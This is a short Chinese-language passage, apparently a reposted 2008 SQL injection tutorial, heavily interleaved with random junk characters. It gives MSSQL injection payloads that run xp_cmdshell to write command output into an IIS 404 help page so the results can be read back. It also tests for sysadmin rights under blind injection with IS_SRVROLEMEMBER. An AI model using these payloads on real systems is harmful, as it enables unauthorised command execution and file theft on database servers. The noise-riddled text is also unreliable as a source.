* ?" ?5 \* R+ i 执行命令得到回显7 u: a t* _6 H9 l; h7 C' J
7 Z V6 C4 m8 v
通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--$ c7 I# m$ j3 E
1 b8 G E2 M$ j$ j 得到文件也shi相同,把文件copy到404b.htm就行了! Q# `- q% Z+ K- D# g0 l b% \6 B
C+ |4 G) ~# p by 28ice, 2008/6/26) L- X& V# _ r8 Q a
7 h2 g- }" G W4 |) Y 摘自 28度的冰 u. V1 L& n0 w / H" I2 V/ A, Y' e$ \( k 盲注判断权限和操作系统版本 8 u h& p$ h3 ?" f6 v% k1 g% I3 U G. {8 m. ~9 K. ?5 e0 u
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢? . m7 h& T, R4 o: q4 H n4 z7 @2 w$ V( u. I0 G
最简单的,可能以用这样的方法: ( b2 k7 H6 ?9 y8 o4 O- w' ~4 J3 I
1=(select IS_SRVROLEMEMBER(’sysadmin’))& K' j1 W4 E1 k* L) u! r